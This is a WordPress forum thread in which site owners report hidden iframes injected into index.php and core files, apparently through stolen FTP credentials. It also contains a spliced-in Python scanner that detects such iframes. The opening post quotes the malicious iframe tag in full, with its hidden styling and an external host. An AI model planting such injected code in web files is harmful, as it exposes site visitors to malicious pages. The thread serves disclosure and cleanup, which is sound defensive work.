• Hello –

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specific hack code is:
    <iframe src="https://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    • Gauge how often it’s happening
    • Share solutions
    • Expose the culprits, if possible
    • Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advice, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for viruses on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do the same.

    Here are the other useful threads I have found:

    – Scott

Viewing 15 replies - 1 through 15 (of 38 total)
  • Thread Starter WebFadds

    (@webfadds)

    Hello –

    UPDATE: I have had this problem now on about 5 sites in the last week, and also discovered iframe insertion hack in the default-filters.php file in the wp-includes file.

    All team members have swept their own PCs and not found anything related.

    We are proceeding to sweep hosting servers and change FTP passwords.

    – Scott

    Thread Starter WebFadds

    (@webfadds)

    Hello –

    Good news all… one of our colleagues in the battle has programmed a new plugin, which specifically scans and checks for iframes:
    https://www.ads-software.com/extend/plugins/antivirus/ – released 6/18

    I am using it and will report here. Your experiences and reports will help too.

    – Scott

    definitely a FTP password hack.

    I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

    Thread Starter WebFadds

    (@webfadds)

    Hi Gariben –

    I have FileZilla, but was not using it. Was using Fetch (a Mac based FTP program). Why do you think Adobe Reader 8.0 was involved?

    UPDATE: After cleaning the index.php files on the infected systems, changing passwords, and installing the antivirus plugin reported above, have had no more incidents of the attack.

    – Scott

    I had the same issue just today and have just removed all the iframe stuff from my index.php files and also on the default-filters.php. Site is back up now, but I have a question concerning one of the index files. On wp-content/themes there is an index.php and the only thing it says (after removing the iframe line) is “Silence is golden”. Now I suspect that is a practical joke of whoever comes up with this stuff, but just to be sure… can I delete the entire index.php with that line in it?

    O and btw; I use Cyberduck…

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.ads-software.com Admin

    The semi-empty index.php is there to prevent people from seeing what’s in your theme directory. A blank index.php works just as well, but if you remove it, it might cause a security issue.

    In other words, the “Silence” part is official. It’s what’s there in WordPress too.

    Thanks Otto! See that is something I didn’t know… Good thing I didn’t remove it then…
    What I did notice is that I all of a sudden have the letters ‘f’ on top of my weblog… How did it get there and how do I remove it? Not sure where to look and I’m also not sure if this is related to the problem with the index….

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.ads-software.com Admin

    The f is probably just some text somewhere at the bottom of a file. Look in the theme files, as well as any files you may have edited recently.

    My site is hacked again but I can’t seem to be able to solve it!! I’ve changed all the index.php files and a couple of others as well. The only thing I can see is that there seems to be an index.html file that is also changed. I don’t know how to read or change html and am also not sure if that is causing the issue, but it is driving me insane!! Hope someone can help me out here on what to do!

    you MUST change your ftp password, junglefrog

    and as for editing .html files — you can edit that in a plain text editor.

    If someone could break into your site via FTP why would they make such minor changes when they could run roughshod and change things all over the place. I don’t buy the FTP explanation.

    This type of FTP hack is quite common these days. In almost every case it is an infected PC (with malware) that collects FTP u/p information from FTP programs on the PC. This data is transmitted to the hacker network, that then runs bots to insert iframe malicious code in index* pages, .htaccess, main* pages, etc… all automatically.

    Run a full a/v scan, and then download and run malwarebytes.org software once it’s updated on any PC that might have your FTP u/p stored in an FTP program (including designers, developers, SEO, outsource companies, etc…)
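
    Added example, not part of the thread or any poster's code: a small scanner for the pattern this thread describes, a hidden `<iframe>` with an external `src` (as in the tag quoted in the opening post) inserted automatically into `.php` and `.html` files (as described in the reply above). The function names, the sample tree and the host `injected.example` are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic modelled on the tag quoted in the thread: external src + invisible style.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?(https?://[^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SCAN_EXT = {".php", ".html", ".htm"}

def find_hidden_iframes(text):
    """Return [(line_no, src_url)] for each hidden iframe with an external src."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for tag in IFRAME_RE.findall(line):
            src = SRC_RE.search(tag)
            if src and HIDDEN_RE.search(tag):
                hits.append((line_no, src.group(1)))
    return hits

def scan_tree(root):
    """Walk root; map each affected file (relative POSIX path) to its hits."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_EXT:
            hits = find_hidden_iframes(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Scan a constructed WordPress-like tree (sample data, not from the thread)."""
    bad = '<iframe src="http://injected.example:8080/in.cgi?x" width=125 height=125 style="visibility: hidden"></iframe>'
    files = {
        "index.php": "<?php\nrequire('./wp-blog-header.php');\n" + bad,
        "wp-includes/default-filters.php": "<?php\n// filters\n" + bad + "\n",
        "wp-content/themes/index.php": "<?php\n// Silence is golden.\n?>",
        "about.html": '<iframe src="https://video.example/embed/1" width=560></iframe>',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

    The check is line-based and only matches tags styled invisible, so a clean result narrows the search but does not show that a site is clean; the visible embed in `about.html` is deliberately not flagged.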

    I have changed all my passwords, added antivirus protection and well, it still happened. I changed everything again. It is fixed now; apparently there was also something changed in a configuration file. But it’s sorted. I have a mac and not a pc.
    Other than myself no one has the passwords… Fingers crossed..

    I have a mac …

    interesting. I’ve cleaned up about 15 sites now where the primary user was on a mac.

    I am also facing the same problem from past one week. I found iframe code in many files like index.php, default-filters.php. I removed and reinstalled WP and still the problem is there. I have also installed antivirus plugin but still have problems. Any permanent solution to this problem? Any help would be highly appreciated.

  • The topic ‘iFrame Hack on Several WP Sites’ is closed to new replies.